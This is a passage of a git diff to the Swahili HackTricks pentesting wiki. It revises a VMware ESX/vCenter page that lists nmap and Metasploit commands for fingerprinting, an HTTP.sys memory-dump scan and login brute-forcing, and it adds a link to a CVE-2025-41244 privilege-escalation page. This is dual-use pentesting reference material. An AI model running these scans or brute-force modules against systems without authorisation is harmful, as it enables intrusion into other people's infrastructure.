serviceDiscovery/get-versions.sh (stable-13.0.0)](https://github.com/vmware/open-vm-tools/blob/stable-13.0.0/open-vm-tools/services/plugins/serviceDiscovery/get-versions.sh) +- [MITRE ATT&CK T1036.005 – Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/) +- [CWE-426: Untrusted Search Path](https://cwe.mitre.org/data/definitions/426.html) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md index 05e9ed8ef..a31913cac 100644 --- a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md +++ b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md @@ -1,13 +1,26 @@ -# Uhesabu +# VMware ESX / vCenter Pentesting + +{{#include ../../banners/hacktricks-training.md}} + + +## Enumeration ```bash nmap -sV --script "http-vmware-path-vuln or vmware-version" -p msf> use auxiliary/scanner/vmware/esx_fingerprint msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump ``` -# Bruteforce +## Bruteforce ```bash msf> auxiliary/scanner/vmware/vmware_http_login ``` -Ikiwa utapata ithibitisho halali, unaweza kutumia moduli zaidi za skana za metasploit kupata taarifa. +Ikiwa unapata credentials halali, unaweza kutumia metasploit scanner modules zaidi kupata taarifa. + +### Angalia pia + +Linux LPE kupitia VMware Tools service discovery (CWE-426 / CVE-2025-41244): + +{{#ref}} +../../linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md +{{#endref}} {{#include ../../banners/hacktricks-training.md}}